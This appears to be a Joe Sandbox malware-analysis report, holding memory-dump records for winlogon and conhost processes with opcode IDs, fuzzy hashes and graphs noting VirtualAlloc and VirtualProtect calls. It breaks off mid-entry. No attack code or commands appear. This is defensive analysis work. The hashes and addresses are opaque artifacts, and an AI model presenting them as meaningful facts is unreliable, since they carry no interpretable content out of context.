                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 406c0320ee0fa3ec982233ccb0021b39c1ae103a52350120466acd4e6564ae2a
                                                                                                • Instruction ID: e035278ca2e6b957d42e7fbb1474e90e601fa21ccb1b4d4ac3856f0f0625e202
                                                                                                • Opcode Fuzzy Hash: 406c0320ee0fa3ec982233ccb0021b39c1ae103a52350120466acd4e6564ae2a
                                                                                                • Instruction Fuzzy Hash: 8B111220B1A90E4FEBF4EFD488E97B87291EF5D304F5500B9D40DD72B2DE28AA44A700
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 95eca61ae06e1b84621d1994add1f61b943c9eaa11c604726877cc3372543f82
                                                                                                • Instruction ID: ed994b05953bf7d4678f6d074afaad6c017ef86e0098485581d98341a796a899
                                                                                                • Opcode Fuzzy Hash: 95eca61ae06e1b84621d1994add1f61b943c9eaa11c604726877cc3372543f82
                                                                                                • Instruction Fuzzy Hash: 5511C231E1E28D8FEB12DBA888A409C7BB0EF56718F0641F7C044DB2E2D93867469740
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fcbb7afc1ac5306dee0586f071aa919c658eee4105b8a47b8cc361170641753e
                                                                                                • Instruction ID: 061cb223194e62f4ed238f70b2fd3a81ab316c25ee5288e3c9c1a81b46a511bc
                                                                                                • Opcode Fuzzy Hash: fcbb7afc1ac5306dee0586f071aa919c658eee4105b8a47b8cc361170641753e
                                                                                                • Instruction Fuzzy Hash: 73017521B1E90D8BEB74EFA4C8E867833D1DB99754F1601B5D409C32B2DD18AA41A640
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c87cf6cf402f2026c023dde047bfe10f691ac85107b3be7e00946141743bb911
                                                                                                • Instruction ID: f5275dc1af9d989ef1c5a77a987fe378075a5d3503d4271f60362026de8e3194
                                                                                                • Opcode Fuzzy Hash: c87cf6cf402f2026c023dde047bfe10f691ac85107b3be7e00946141743bb911
                                                                                                • Instruction Fuzzy Hash: 64018431E1E28D8FEB16DBA4889409C7FB0EF56718F1641F7D044DB2A2D9346B459740
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: c9$!k9$"s9$#{9
                                                                                                • API String ID: 0-1692736845

                                                                                                Execution Graph

                                                                                                 Execution Coverage: 4.3%
                                                                                                 Dynamic/Decrypted Code Coverage: 100%
                                                                                                 Signature Coverage: 0%
                                                                                                 Total number of Nodes: 6
                                                                                                 Total number of Limit Nodes: 0
                                                                                                 execution_graph (node list recovered from the rendered graph):
                                                                                                 • 7ffd9b88b1aa → 7ffd9b88b1b9 (VirtualProtect) → 7ffd9b88b29e
                                                                                                 • 7ffd9b88c181 → 7ffd9b88c18f (VirtualAlloc) → 7ffd9b88c244

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5[_H
                                                                                                • API String ID: 0-3279724263

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B888000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B888000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b888000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 544645111-0

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                 control_flow_graph (basic blocks and edges recovered from the rendered graph):
                                                                                                 • 7ffd9b88c181-7ffd9b88c18d → 7ffd9b88c18f, 7ffd9b88c191-7ffd9b88c1cd
                                                                                                 • 7ffd9b88c18f → 7ffd9b88c191-7ffd9b88c1cd, 7ffd9b88c1d1-7ffd9b88c242 (VirtualAlloc)
                                                                                                 • 7ffd9b88c191-7ffd9b88c1cd → 7ffd9b88c1d1-7ffd9b88c242 (VirtualAlloc)
                                                                                                 • 7ffd9b88c1d1-7ffd9b88c242 (VirtualAlloc) → 7ffd9b88c24a-7ffd9b88c272, 7ffd9b88c244
                                                                                                 • 7ffd9b88c244 → 7ffd9b88c24a-7ffd9b88c272
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B888000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B888000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b888000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: fd007314ea28f01cab09209a5aba62497771038bf8341b4f2dc4d45734023e3d
                                                                                                • Instruction ID: ecbce58f7d08cdd5efa2aa90a69ff6190ba210e97996179a55401ba501b222c5
                                                                                                • Opcode Fuzzy Hash: fd007314ea28f01cab09209a5aba62497771038bf8341b4f2dc4d45734023e3d
                                                                                                • Instruction Fuzzy Hash: 0B31FB31A0CB4C8FDB1DAB6C98166F9BBF0EF56321F10426FD05AC3152DA7468168795

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 53 7ffd9b893a29-7ffd9b893a3d 54 7ffd9b893a3f-7ffd9b893a5a 53->54 55 7ffd9b893a5e-7ffd9b893a63 54->55
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b890000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: M
                                                                                                • API String ID: 0-3664761504
                                                                                                • Opcode ID: cbddb5b97010383b29637cf9a56d37cd4821c471ee3a8c7e811342c06ca9e0e9
                                                                                                • Instruction ID: 01b008cfc2c2d3cd2dbc9aac2979246d8f614dc7829d5bb58648c2be61c562a6
                                                                                                • Opcode Fuzzy Hash: cbddb5b97010383b29637cf9a56d37cd4821c471ee3a8c7e811342c06ca9e0e9
                                                                                                • Instruction Fuzzy Hash: 0EF06571A4F7C54FCB16AA3488658547FA0EF6720174A52EEC045CF1E3DA2DDC8ACB11

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 56 7ffd9b8a5619-7ffd9b8a564a 57 7ffd9b8a564e-7ffd9b8a5653 56->57
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b8a1000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: M
                                                                                                • API String ID: 0-3664761504
                                                                                                • Opcode ID: 6f2b87595dcc646dcdb325e2cc22d6c29e67dfa18fb1908c73558b51357ab1e3
                                                                                                • Instruction ID: b34511a45e21b288402e2a9d3dada772e9a56df924e6b87daad18560c65a8ce7
                                                                                                • Opcode Fuzzy Hash: 6f2b87595dcc646dcdb325e2cc22d6c29e67dfa18fb1908c73558b51357ab1e3
                                                                                                • Instruction Fuzzy Hash: 77E0923064E7C44FCB16AB3488684547F70EF6720174A42EEC05ACF1A7EB2DC98AC701

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 58 7ffd9b8a9449-7ffd9b8a9474 60 7ffd9b8a9478-7ffd9b8a947d 58->60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b8a1000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: I
                                                                                                • API String ID: 0-3707901625
                                                                                                • Opcode ID: e32b4aaf5d45e087c8742554feeaf95873a8ecd19e5df79767dbc94f747141de
                                                                                                • Instruction ID: 9f8d1d6699d3b4fcc569e11a253fb955fba038205e6ccc62ef4b7d96fb9170ce
                                                                                                • Opcode Fuzzy Hash: e32b4aaf5d45e087c8742554feeaf95873a8ecd19e5df79767dbc94f747141de
                                                                                                • Instruction Fuzzy Hash: DEE01A6194F3D44FCB5AAB7488699543FB0AF6B21078B41EEC186CF1B3E62D9849C712

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 61 7ffd9b8a95f9-7ffd9b8a9624 63 7ffd9b8a9628-7ffd9b8a962d 61->63
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b8a1000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: I
                                                                                                • API String ID: 0-3707901625
                                                                                                • Opcode ID: be175d6ff2bf495af3fbbdad21f173e96363bd5951b43badf5b745a9fe3ca608
                                                                                                • Instruction ID: ba953d79276908f8b1c5965e08471aa22acb52f2b9af41b076d4df89630ebb6b
                                                                                                • Opcode Fuzzy Hash: be175d6ff2bf495af3fbbdad21f173e96363bd5951b43badf5b745a9fe3ca608
                                                                                                • Instruction Fuzzy Hash: 49E0E57154F3D44FCB1AEBB988698453FA0AE6B21078B41EEC089CF1B3E62DD949C711

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b8a1000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6748885665de1478b76a19614e4044243108376e8afe18e3cb6ca6cc6a66dbb4
                                                                                                • Instruction ID: d24fafe78cc659d8abfd4960bb70cc49c0a55a797ccbf330ce61dbec5e084a41
                                                                                                • Opcode Fuzzy Hash: 6748885665de1478b76a19614e4044243108376e8afe18e3cb6ca6cc6a66dbb4
                                                                                                • Instruction Fuzzy Hash: 3AA1A030B1890D8FDB58EF68C4A4AA977E2FF98304B5505B9D01EC72E6DF38A8428751
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f0695c1831c5d380eef6e68f8b79de46f5bdb9c5164fceb39d6bdf4c2ddc7397
                                                                                                • Instruction ID: c5b944f9a9bc956e4eef0e1d92717bc1b2df8cf724a919a239e4218274f0693d
                                                                                                • Opcode Fuzzy Hash: f0695c1831c5d380eef6e68f8b79de46f5bdb9c5164fceb39d6bdf4c2ddc7397
                                                                                                • Instruction Fuzzy Hash: 3B31FA30A0DA4A8FDB56EB78C8649A97BF1FF5E310B0905FAC059C71A2DE385541C740
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d32431d7d61f74789dfae13fa70862435f5bac2241f648caa007a2a78cf94a2d
                                                                                                • Instruction ID: 55a89c2853c2ec3d53b50e70509c4a93600150b4fa32b02a41995c99840a0d1a
                                                                                                • Opcode Fuzzy Hash: d32431d7d61f74789dfae13fa70862435f5bac2241f648caa007a2a78cf94a2d
                                                                                                • Instruction Fuzzy Hash: F3214135F1DA5D8FE722ABB898250DC7B60DF85724F0545F3C058CB1D3D9382A869751
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8267cee614b08282d2091ea694775f3e8d2d35de4e0a4c36b5addd52ea703b57
                                                                                                • Instruction ID: 49ba9b43e34182a751b974d0cfcedc978bd33bb89bb7b110a5b669f0093d89ec
                                                                                                • Opcode Fuzzy Hash: 8267cee614b08282d2091ea694775f3e8d2d35de4e0a4c36b5addd52ea703b57
                                                                                                • Instruction Fuzzy Hash: BB310E31E1895D8FDB64EB54C8A47A972A1FB5C324F1501BDD41ED32E1CA396E81CB41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c755e17f7d9966cc3d01fd151e628425b1f0bf07c79701fd9e96edc305e1c2c8
                                                                                                • Instruction ID: dfd89235822056c8b69d429db7ad6e2f1b440916286932d9c79c208a29ba7e54
                                                                                                • Opcode Fuzzy Hash: c755e17f7d9966cc3d01fd151e628425b1f0bf07c79701fd9e96edc305e1c2c8
                                                                                                • Instruction Fuzzy Hash: 42110C20B1AD0E8FEBA4EF9488A57B86291EF5C301F5500B9C41ED72B2DE38AA448710
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b0d4b3ce926893a87e318e1d1af0a2c35c0ebf35d28aef39388c493214434887
                                                                                                • Instruction ID: 26db16c5fa50d79b017cae106418b5f22e7ef867c3ad606ca9b1458e48d68e03
                                                                                                • Opcode Fuzzy Hash: b0d4b3ce926893a87e318e1d1af0a2c35c0ebf35d28aef39388c493214434887
                                                                                                • Instruction Fuzzy Hash: 6711A535F1EA8D8FE722DFA4886109C7FB1EF56714F0645F7C054DB2A2D9386A458780
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c13e825169c82e0260183b0dfc059ff39dc103e1a37d20102da221b4f3c6b246
                                                                                                • Instruction ID: d7254e299d0c61633fd50ebeeaaf2b73b15b763aa472bfd5dc29bfbfdbf89828
                                                                                                • Opcode Fuzzy Hash: c13e825169c82e0260183b0dfc059ff39dc103e1a37d20102da221b4f3c6b246
                                                                                                • Instruction Fuzzy Hash: 88011E21B1ED0D8BEB64EF9884A967823D2DF98710F1601B9D41AC72B2DD29AA418640
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b890000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8a8d3b4fd29dd231a59ab23c32f68f7f023d90f41b574e22d7000da38cb76b49
                                                                                                • Instruction ID: 53628ea54a5a0456ebef643ac179e7f374f28925f1c1c01116258b0154ed8f5d
                                                                                                • Opcode Fuzzy Hash: 8a8d3b4fd29dd231a59ab23c32f68f7f023d90f41b574e22d7000da38cb76b49
                                                                                                • Instruction Fuzzy Hash: 21F0A931B0E6894BE771975884646B93B52AB99310F0E03BBC489CB1E3DD6CD6454381
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 597a111aaa3ff7193ac4c8d1aa9993a163465701550ac9b6362354db1bca4f5e
                                                                                                • Instruction ID: 37f4339d33d39cd644b4e054429b46a73f4236abb15be0902c5367a7f2ccc744
                                                                                                • Opcode Fuzzy Hash: 597a111aaa3ff7193ac4c8d1aa9993a163465701550ac9b6362354db1bca4f5e
                                                                                                • Instruction Fuzzy Hash: 16018031E1EA8D8FE726DFA4886009C7FB1EF56714F1641F7C054DB2A2D9386A458780
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b8a1000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 41c4d79cae71fac4669935fffd2338c93c4e86040abc328a5c8323fcabe1c913
                                                                                                • Instruction ID: 07cbc111fdfdb034e161684c41f85cf4ce2ddd70c2ca1165ade5af952c0f852b
                                                                                                • Opcode Fuzzy Hash: 41c4d79cae71fac4669935fffd2338c93c4e86040abc328a5c8323fcabe1c913
                                                                                                • Instruction Fuzzy Hash: 20F0172060F7C40FCB129B758C694657FF0AF5B10074E85EBD489CF1A3DA19984A8312
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b890000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6d70275c0af938dd855f8d7380c6089d45fd5d6ec2a2d88169b4a69653ade370
                                                                                                • Instruction ID: a0d9560229c21c8a27e9debf62b90d4d6cbbeb87233b599a8ecf671c6d0e9f4a
                                                                                                • Opcode Fuzzy Hash: 6d70275c0af938dd855f8d7380c6089d45fd5d6ec2a2d88169b4a69653ade370
                                                                                                • Instruction Fuzzy Hash: 43F04F71E0551E8BEB68DB44C8686BD77F1FF54310F040A3AC415D32A4DF7869428B80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction ID: 8629ccb71356551793cb72b9435150d64bf50a69d22b91340b35a22e1fcecbb4
                                                                                                • Opcode Fuzzy Hash: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction Fuzzy Hash: 9EF0F434A1AD0E8BEBA4FFC0C8A46B87361EF58311F510179C41AD72B1CE386A85C700
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b890000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f2bb60bd4aab3c2f2d65c5010c5c93abf419b99a4010c605e80952fb68c6db48
                                                                                                • Instruction ID: 793c16305598de0da2036bd3913b430ef0dee1226a1446d76d8f3a44a313ab82
                                                                                                • Opcode Fuzzy Hash: f2bb60bd4aab3c2f2d65c5010c5c93abf419b99a4010c605e80952fb68c6db48
                                                                                                • Instruction Fuzzy Hash: 8AF05430B0D91F8BFE359B98E4505B93390FF59711F164179D85AC31E7DE28EA428680
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b8a1000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d42dea046c5fc3cd9f5167775ac7a0eb666f0a10076f182ca0fe3da02a91fd51
                                                                                                • Instruction ID: 3e0a9effb5b4379b3dea4615c122526dd3d7830f0d2d2b3d5d97d14099ed72c8
                                                                                                • Opcode Fuzzy Hash: d42dea046c5fc3cd9f5167775ac7a0eb666f0a10076f182ca0fe3da02a91fd51
                                                                                                • Instruction Fuzzy Hash: 58F01C6155F7D41FD3229B388C254557FA0EB1710574A46EBC0C9CB5B3EA0A988B8312
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1ad9a244f7cd5447796236964af92ac81ba002f4e744fe8ea3e057417be7fd7c
                                                                                                • Instruction ID: b10887ccd69301f65b0a8d17f0ca9c492a37062c1736828b9cffde1dd045319c
                                                                                                • Opcode Fuzzy Hash: 1ad9a244f7cd5447796236964af92ac81ba002f4e744fe8ea3e057417be7fd7c
                                                                                                • Instruction Fuzzy Hash: BEF05461F1AD2E4BF7B0F79484A53B812D1AF1C710F1A0071D46DE32B1CE3CAE814655
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction ID: 938b93f7eb412964e14054d9f2b4f6d1dd7efd82c935e5241432befb80103025
                                                                                                • Opcode Fuzzy Hash: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction Fuzzy Hash: 9DF0D020B1AD0D8BEBB0EF84C9A47B93352EF58311F1141B9C91AD72B2DD396E458650
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 83bdcf602e07a404063837063a72e3b080efcd13ef7de0a38ab00887b9b98ad2
                                                                                                • Instruction ID: 9f5b7309a426feb05000baf4dfe09e6724018c7b8bfded05f4b6f32488bceda1
                                                                                                • Opcode Fuzzy Hash: 83bdcf602e07a404063837063a72e3b080efcd13ef7de0a38ab00887b9b98ad2
                                                                                                • Instruction Fuzzy Hash: FBF0B430B19A0ACBE758DFA4C8A46B977E1EB58711F1482BAD019C32E5DD3866848B40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 799547bdc4b8b02356aba67cfad2182590c21856955f89d8743d5cbd30a2dfe2
                                                                                                • Instruction ID: 1e523c32268fb004e96e809629e0eb3178f4dc3eb8e7f2c0366b249b0bdaebea
                                                                                                • Opcode Fuzzy Hash: 799547bdc4b8b02356aba67cfad2182590c21856955f89d8743d5cbd30a2dfe2
                                                                                                • Instruction Fuzzy Hash: 3EE06D61F2AC1E0BE6F4FB5880A57B822D2AB5C740B160071C42ED22B1CD3C6E814745
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b8a1000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 73c4eea8d5fd7ee54f4ef704b5878736710ad86fb46bd5762e653c68637d7c5e
                                                                                                • Instruction ID: 4dba96596e80f47223296c7c23f94e70163d3ee1994bf7eb2f60c1afda9a3506
                                                                                                • Opcode Fuzzy Hash: 73c4eea8d5fd7ee54f4ef704b5878736710ad86fb46bd5762e653c68637d7c5e
                                                                                                • Instruction Fuzzy Hash: 87E0CD3061B6484FCF44DF3DCC095147BD1FB59501B49C2BE944DCB2A2CE55D8854301
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 870243141dd7990a0185a18ac1a50ac2a77a54213ccd36e8ede696c6bdef635b
                                                                                                • Instruction ID: 2f6ee3fec663a85419f582050012b29c54db3e2986bb3052b50fe47439498add
                                                                                                • Opcode Fuzzy Hash: 870243141dd7990a0185a18ac1a50ac2a77a54213ccd36e8ede696c6bdef635b
